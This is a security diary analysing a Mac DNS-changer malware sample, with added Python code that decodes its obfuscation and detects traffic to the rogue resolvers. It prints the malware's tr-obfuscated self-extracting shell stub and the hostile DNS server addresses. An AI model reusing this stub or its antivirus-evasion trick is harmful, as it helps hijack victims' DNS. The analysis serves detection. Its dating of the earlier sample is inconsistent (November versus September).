(Minor) evolution in Mac DNS changer malware
Back in November last year we published a diary about Mac DNS changer malware (http://isc.sans.org/diary.html?storyid=3595). The main point was to make Mac users aware that the bad guys are no longer ignoring this platform.
While the malware itself was not anything spectacular (i.e. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.
All the malware did was change the local DNS servers to a couple of servers in a known bad network, and tell the command and control server that a new victim is ready.
The anti-virus coverage was especially disappointing. Only a couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it.
One of our readers, Matt, submitted a new sample today. I quickly analyzed it and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server.
However, one thing I noticed was that the attackers started obfuscating the installation code. The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. Signature detection failure I would say …
The deobfuscation is really simple: the new sample looks like this:
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw;
sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
Ndkf
…
In other words, the stub reads its own file, counts the lines, subtracts 2, takes that many lines from the end of the file (i.e. everything after the stub), passes them through the first tr command, and redirects the decoded output to a file named 1, which is then executed with sh.
The second and third tr commands deobfuscate the s1 and s2 variables, which hold the IP addresses of the DNS servers and are passed to the decoded script as arguments. They can easily be deobfuscated manually:
$ s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw; echo $s1|tr qazwsxedcr 0123456789
85.255.115.20
$ echo $s2| tr qazwsxedcr 0123456789
85.255.112.143
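The same decoding, written out as a small Python emulation of the tr-based stub so the mapping can be checked without running anything from the sample. This is an added example, not code from the diary or from the malware; the two alphabet pairs are copied from the stub above, the stub layout in the constructed sample is joined onto one line so that the "skip the first two lines" step matches the description, and the payload is limited to the two obfuscated lines shown in the diary.

```python
"""Emulate the tr-based deobfuscation used by the Mac DNS changer stub (added example)."""
import ipaddress
import re

# SET1/SET2 arguments of the three tr commands in the stub shown in the diary.
BODY_FROM = "vdehrujzpbqafwtgkxyilcnos"
BODY_TO = "upxmfqrzibdanwgkethlcyosv"
IP_FROM = "qazwsxedcr"
IP_TO = "0123456789"


def tr(text, set1, set2):
    """Behave like `tr SET1 SET2` for equal-length sets: each character of set1 is
    replaced by the character at the same position in set2; anything else is kept."""
    if len(set1) != len(set2):
        raise ValueError("equal-length sets expected for this emulation")
    return text.translate(str.maketrans(set1, set2))


def decode_ip(obfuscated):
    """Decode an s1/s2 value and validate that the result really is an IPv4 address."""
    return str(ipaddress.ip_address(tr(obfuscated, IP_FROM, IP_TO)))


def decode_dns_servers(script):
    """Pull the s1= and s2= assignments out of the stub and decode both addresses."""
    m = re.search(r"s1=([^;]+);s2=([^;]+);", script)
    if not m:
        raise ValueError("stub does not contain s1/s2 assignments")
    return decode_ip(m.group(1)), decode_ip(m.group(2))


def extract_payload(script):
    """Replicate `x=$(wc -l) - 2; tail -$x $0 | tr ...`: drop the first two lines
    (shebang + stub), then run the remainder through the body alphabet."""
    lines = script.split("\n")
    if lines and lines[-1] == "":          # wc -l counts newlines, so a trailing
        lines.pop()                        # newline does not add a line
    x = len(lines) - 2
    tail = lines[-x:] if x > 0 else []
    return "\n".join(tr(line, BODY_FROM, BODY_TO) for line in tail)


# Constructed sample: the stub from the diary joined onto one line, followed by the
# first two obfuscated payload lines the diary shows.
SAMPLE = (
    "#!/bin/sh\n"
    "x=`cat \"$0\" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x \"$0\" "
    "|tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;"
    "s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw;"
    "sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;\n"
    "#!/bpf/oy\n"
    "daxy=\"/Lpbjajc/Ifxkjfkx Pivt-Ifo\"\n"
)

if __name__ == "__main__":
    print("DNS servers:", decode_dns_servers(SAMPLE))
    print(extract_payload(SAMPLE))
```

Running it on the constructed sample yields the two addresses from the diary and turns the obfuscated shebang into `#!/bin/sh` and the second line into `path="/Library/Internet Plug-Ins"`, which is the same decoding the stub performs on the victim's machine.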
As you can see, it's the same network as before, so make sure that you are monitoring for any DNS requests going there, since they indicate that you have infected machines on your network. As for the AV vendors, they will obviously have to step up on the Mac front.
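One way to act on that monitoring advice, as an added example that is not part of the diary: flag port-53 flows to the two decoded addresses in firewall logs, and check a Mac's configured resolvers for the same addresses. The log line format and the `scutil --dns`-style output below are constructed samples; the diary names only the two addresses, not a CIDR range, so they are listed as /32 networks and the list can be widened by the operator.

```python
"""Spot traffic to, or resolver settings pointing at, the DNS servers named in the diary (added example)."""
import ipaddress
import re

# The two resolver addresses decoded in the diary, as /32 networks so a wider block
# can be substituted without changing the code (assumption: no CIDR is given in the diary).
KNOWN_BAD = [ipaddress.ip_network("85.255.115.20/32"),
             ipaddress.ip_network("85.255.112.143/32")]

# Constructed firewall log format: "... src=A.B.C.D:port dst=E.F.G.H:port"
LOG_RE = re.compile(r"src=(?P<src>[\d.]+):\d+\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)")
# Matches the "nameserver[0] : 1.2.3.4" lines that `scutil --dns` prints on macOS.
SCUTIL_RE = re.compile(r"nameserver\[\d+\]\s*:\s*([\d.]+)")


def is_bad(addr, networks=KNOWN_BAD):
    """True if the address falls inside any listed network."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in networks)


def find_rogue_dns_clients(log_lines, networks=KNOWN_BAD):
    """Return {client_ip: [destination, ...]} for every port-53 flow to a listed network.
    Non-DNS traffic to the same hosts is ignored here; the diary's indicator is DNS."""
    hits = {}
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or m.group("dport") != "53":
            continue
        if is_bad(m.group("dst"), networks):
            hits.setdefault(m.group("src"), []).append(m.group("dst"))
    return hits


def flagged_resolvers(scutil_dns_output, networks=KNOWN_BAD):
    """Parse `scutil --dns`-style output and return configured resolvers in a listed network."""
    found = {ip for ip in SCUTIL_RE.findall(scutil_dns_output) if is_bad(ip, networks)}
    return sorted(found)


# Constructed sample log lines: one client talking to both rogue resolvers, one clean
# client, and a non-DNS connection that must not be counted.
SAMPLE_LOG = [
    "Jan 14 10:22:31 fw: proto=udp src=192.168.1.23:51234 dst=85.255.115.20:53",
    "Jan 14 10:22:32 fw: proto=udp src=192.168.1.23:51235 dst=85.255.112.143:53",
    "Jan 14 10:22:40 fw: proto=udp src=192.168.1.40:40001 dst=192.168.1.1:53",
    "Jan 14 10:23:05 fw: proto=tcp src=192.168.1.23:51300 dst=85.255.115.20:80",
]

# Constructed resolver listing in the shape of `scutil --dns` output.
SAMPLE_SCUTIL = """resolver #1
  nameserver[0] : 85.255.112.143
  nameserver[1] : 85.255.115.20
resolver #2
  nameserver[0] : 192.168.1.1
"""

if __name__ == "__main__":
    print("clients using rogue resolvers:", find_rogue_dns_clients(SAMPLE_LOG))
    print("rogue resolvers configured locally:", flagged_resolvers(SAMPLE_SCUTIL))
```

On a real Mac the second check is `scutil --dns | python3 -c 'import sys; ...'` with the output piped in; on the constructed sample it reports both addresses, while the log check attributes the DNS flows to 192.168.1.23 and leaves the port-80 line out.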
--
Bojan